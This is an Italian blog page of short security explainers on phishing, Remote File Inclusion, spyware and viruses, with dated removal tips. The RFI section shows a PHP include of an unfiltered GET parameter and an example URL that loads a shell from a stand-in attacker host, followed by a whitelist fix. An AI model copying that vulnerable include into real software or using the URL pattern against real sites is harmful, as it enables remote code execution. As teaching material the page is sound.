Definizioni Informatiche
[Video] Cos’è il web 2.0?
ott 10
In questa video illustrazione offerta da http://www.notinwords.com, sito web che ha anche un canale su YouTube (http://www.youtube.com/user/notinwords), spiegato tutto senza parlare:
Giovanni Manai
Definizioni Informatiche: Phishing
gen 4
Ne iniziammo a parlare fin dall’inizio della community, poi approfondimmo con l’articolo “Definizioni Informatiche: Ingegneria sociale (Social Engineering) cosè e in che medo sfruttare questa tecnica!”, ma non abbiamo mai spiegato nello specifico cosa fosse veramente..Ebbene il Phishing non e altro che una forma di Cyber Criminalità (frode informatica), in pratica il criminale informatico incità la vittima ad inserire i suoi dati personali in alcune pagine web, i dati poi verranno salvati e inviati o via mail oppure in un file del ftp, per convincere l’utente (vittima) a inserire i suoi dati personali sfruttando Social Network e chat (utilizzando un Social Engineering diretto, cioè parlando direttamente con la vittima), email, facendo credere all’utente che quello è un servizio offertovi gratuitamente da loro (altra forma di Social Engineering), ed in fine sfruttando bug di un sito come ad esempio un redirect (solitamente si utilizza questo metodo per motivi di guadagno). Per evitare queste truffe controllate sempre la barra degli indirizzi, e non fornite mai i vostri dati a siti esterni! 
Ciao By Giovanni Manai! 
Definizioni Informatiche: Remote File Inclusion (RFI) – Cosa sono e come correggerle!
gen 4
Le RFI (Remote File Inclusion), è una delle vunnerabilità web molto più diffuse, si presenta come un bug (errore) delle variabili GET e POST del php, ad esempio ammettiamo di volere creare un index dove c’è questo codice:
$var = $_GET['var'];
include ($var);
Il seguente codice è buggato,infatti il mal’intenzionato di turno (chiamiamolo così), potrebbe utilizzare una shell:
http://sitovittima.it/index.php?var=http://sito_mal’intenzionato.it/shell.txt
per evitar ciò possiamo decidere di includere solo alcune pagine, ad esempio:
if($_GET['var'] == "1"){
include “1.php”;
}elseif($_GET['var'] == "2"){
include “2.php”;
}else{
include “index.php”;
}
In questo modo il problema sarà risolto
Ciao By Giovanni Manai!
Spyware: l’ennesima minaccia su web
gen 4
Prima abbiamo spiegato cos’erano i Virus Informatici, oggi spiegheremo cosa sono gli Spyware. Gli Spyware come i virus possono essere di vari tipi, ora li esamineremo pian piano insieme:
• Iniziamo apparlare di quelli spyware che fanno visualizzare all’utente annunci pubblicitari, ebbene questa tipoligia di spyware viene definita adware, spesso e volentieri questi, vengono installati assieme a dei programmi gratuiti oppure vengono diffusi attraverso i software FileSharing (P2P), non possiamo chiamare Adware però tutti quei software che aprono pagine web con pubblicità, ad esempio chi utilizza MSN Plus, ed installa lo sponsor, non può considerarlo adware, perchè durante l’installazione, è l’utente che lo installato, consapevolte o incosapevolte, è stato lui ad accettare perciò non può essere considerato Adware.
• Ci sono altri spyware invece che si occupano di raccogliere informazioni sulle azioni compiute dall’utente durante l’utilizzo del computer, questa tecnologia di Spyware si è evoluta, ed in alcuni casi può capitare di prenderli durante la navigazione in internet col browser Internet Explorer, attraverso la tecnologià ActiveX di casa Microsoft (Perciò il mi consiglio e quello di utilizzare un browser più sicuro come Mozilla Firefox)
• Un’altra tipologia di Spyware è quella che cambia le impostazione del pc, è posso causare problemi al pc, e vari rallentamenti e blocchi. Anche se molto spesso, solitamente, si limitano a cambiare l’homepage del browser per varie motivazioni, anche se il motivo fondamentale è il “GUADAGNO“.
Ora sapete cosa sono gli spyware, ora scopriremo come eliminarli:
I programmatori si stanno facendo sempre più furbi nell’ultimo periodo, come scritto in precedenza per gli Adware cercano di far acconsentire l’utente in qualsiasi maniera l’installazione dello spyware, in modo che loro si tolgano qualsiasi responsabilità (E questo vale per qualsiasi tipologia di spyware), infatti la prima cosa da fare sarà leggere il contratto di licenza ogni volta che s’installa un nuovo programma, poi come spiegato per i virus è possibile che anche gli spyware si inseriscano all’avvio di Windows quindi andate su Start/Esegui e scrivere msconfig (che sarebbe Utilità Configurazione di sistema) poi andate su “Avvio“, ora togliete la spunta al processo ritenuto pericoloso, applicate e premete ok, fatto ciò andate su start, esegui, regedit ed andate nella chiave di registro HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e cancellate la voce riguardante il processo pericoloso, poi premete F3 e cercate il nome del processo, e controllate se ce ne sono altre e cancellatele, questo naturalmente se sapete già qual’è il processo se non ne avete idea innanzi tutto fate una scansione con HiJackThis (http://download.hijackthis.eu/HJTInstall.exe), una scansione cliccando su “Do a system scan and save a logfile“, e facendo analizzare il file prima a http://www.hijackthis.de/it, poi se il risultato e buono (nel senso che viene trovato il software nocivo) cancellate le voci nocive direttamente dal programma HiJackThis, se non riuscite a risolvere così, controllate pianpiano dal log se i processi avviati corrispondono a quelli dei programmi installati, del sistema, ecc., se in caso contrario trovate processi che non vi sono famigliari cancellateli (le definizioni dei processi le trovate facilmente con una ricerca su web attraverso il motore di ricerca google), come vedete il procedimento e simile a quello di rimozione e simile a quello dei virus, oltre a questo a venirci in contro ci sono dei Software Anti-Spyware come Ad-aware (Disponibile in varie versioni sul sito http://www.lavasoft.it/) oppure Spybot (Disponibile gratuitamente su http://www.safer-networking.org/it/mirrors/index.html), inoltre come già spiegato in precedenza è preferibile l’utilizzo di un browser come Mozilla Firefox (http://www.mozilla-europe.org/it/firefox/) per evitare gli Spyware che si servono della tecnologia ActiveX per propagarsi su web.
NB. Ora sapete qualcosa di più anche sugli spyware!
Alla prossima guida! 
By Giovanni Manai!
Virus: Cosa sono e come ci si difende
gen 4
Tutti noi sappiamo (o almeno spero ) che i virus sono delle cose creano danno hai nostri pc, ma non tutti sanno che i virus vanno divisi in varie categorie ognuna diversa dall’altra, ecco le definizioni correte per ognuna di esse:
• Virus: Sono pezzi di codice associati a un programma, che appena viene avviato riesce a diffondersi nel pc infetto, e a procurare vari danni..
• Worm: Sono una delle categorie di virus più pericolose al mondo, la loro caratteristica e che sono in grado di riprodursi e inviare copie di se stesso ad esempio hai contatti della propria rubrica (quindi di conseguenza hai contatti di quelle persone a cui si auto-inviato, quindi pensate la sua pericolosità).
• Trojan o Trojan Horse: Sono programmi composti da Client e Server creati dai VirusWriter (Termine utilizzato per classificare quella categoria di persone che creano virus) con lo scopo di entrare nei pc all’oscuro della vittima solitamente per spiarne le azioni e trarne vantaggi, i trojan vengono utilizzati anche tra le guerre vituali tra le aziende il cosidetto spionaggio industriale.
• Dialer: Tra gli utenti che utilizzano l’ADSL il pericolo Dialer è ormai estinto, mentre per gli utenti che per vari motivi utilizzano ancora la vecchissima connessione a internet 56K e ISDN il pericolo è ancora incombente, infatti su queste connesioni a internet i dialer all’insaputa dell’utente alterano i parametri della connessione facendolo collegare a numeri telefonici a pagamento facendo arrivare all’utente bollette salatissime, per evitare questo pericolo vi consiglio il programma Digisoft AntiDialer (http://www.digisoft.cc/cgi-bin/down.pl?download/SetupAntiDialer.exe) che blocca le connessioni esterne, favorendo così una maggiore sicurezza.
Ora conoscete le varie tipogie di virus e sapete come bloccare un dialer, adesso vi spiegherò però come bloccare le altre tipologie di virus informatici, iniziamo col dire di installare un buon antivirus anche gratuito (Io vi consiglio di installare AVG quasiasi versione: http://free.avg.com/ww.download-avg-anti-virus-free-edition ) poi anche un buon Firewall (Potete mettere ZoneAlarm che è gratuito ed è veramente buono: http://www.zonealarm.com/store/content/catalog/products/zonealarm_free_firewall.jsp) così renderete un pò più sicuro il vostro computer ad attacchi esterni e virus, ma non basta, infatti il miglior antivirus per il vostro pc siete voi, perchè se voi fate affidamento solo sull’antivirus non potrete mai stare al sicuro, ammettiamo il fatto che girando su web per un qualsiasi motivo prendete un virus, solitamente il riconoscimento dei virus attraverso l’antivirus avviene per firma o euristica, ma ammettiamo che l’antivirus non lo rilevi perchè appena creato, cosa fare? Solitamente il virus presenta alcuni comportamenti anomali nel pc, come rallentamento del pc, spreco di utilizzo della CPU e della RAM anche nelle operazioni più banali, in questo caso e necessario fare una scansione dei processi, a questo punto potremmo usare HiJackThis (http://download.hijackthis.eu/HJTInstall.exe) Fare una scansione cliccando su “Do a system scan and save a logfile“, e facendo analizzare il file prima a http://www.hijackthis.de/it, poi se il risultato e buono (nel senso che viene trovato il software nocivo) cancellate le voci nocive direttamente dal programma HiJackThis, se non riuscite a risolvere così, controllate pianpiano dal log se i processi avviati corrispondono a quelli dei programmi installati, del sistema, ecc., se in caso contrario trovate processi che non vi sono famigliari cancellateli (le definizioni dei processi le trovate facilmente con una ricerca su web attraverso il motore di ricerca google), altra cosa da sapere che i virus o più generalmente i software dannosi la maggior parte delle volte si inseriscono all’avvio, allora prima cosa da fare è andare su Start/Esegui e scrivere msconfig (che sarebbe Utilità Configurazione di sistema) poi andate su “Avvio“, ora togliete la spunta al processo ritenuto pericoloso, applicate e premete ok, fatto ciò andate su start, esegui, regedit ed andate nella chiave di registro HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun e cancellate la voce riguardante il processo pericoloso, poi premete F3 e cercate il nome del processo, e controllate se ce ne sono altre e cancellatele, un ultima cosa da sapere è che alcune volte i virus vengono rilevati nella cartella c:System Volume Information_restore (la cartella del Ripristino di configurazione del Sistema) è l’antivirus non riesca ad cancellarlo, allora a questo punto bisognera andare su Start, cliccate col tasto desto su Risorse del computer, e poi cliccate Proprietà, a questo punto Ripristino configurazione di sistema, e mettete la spunta a Disattiva Ripristino configurazione di sistema, e riavviate il pc, e all’avvio della scherma Power On Self Test premete F8 (siccome son sicuro che la maggior parte di voi non sà cos’è il Power On Self Test vi allego un immagine ) :
(Immagine By mechbgon.com)
Una volta premuto F8, utilizzate le frecce “Su” e “Giù” della tastiera per direzionarvi su la voce Modalità Provvisoria, appena avete selezionato la voce premete Invio, ed entrate con l’account amministratore, ora potrete avviare la scansione con l’antivirus, in quale provvederà a rimuovere il file oppure rimuoverlo manualmente (se sapete qual’è), senza alcun problema (Vi ricordo di seguire passo passo le istruzioni spiegate per far si che quest’ultimo procedimento funzioni).
NB. Questo è il minimo necessario da sapere, può sempre capitare di avere questi problemi!
Ciao By Giovanni Manai!
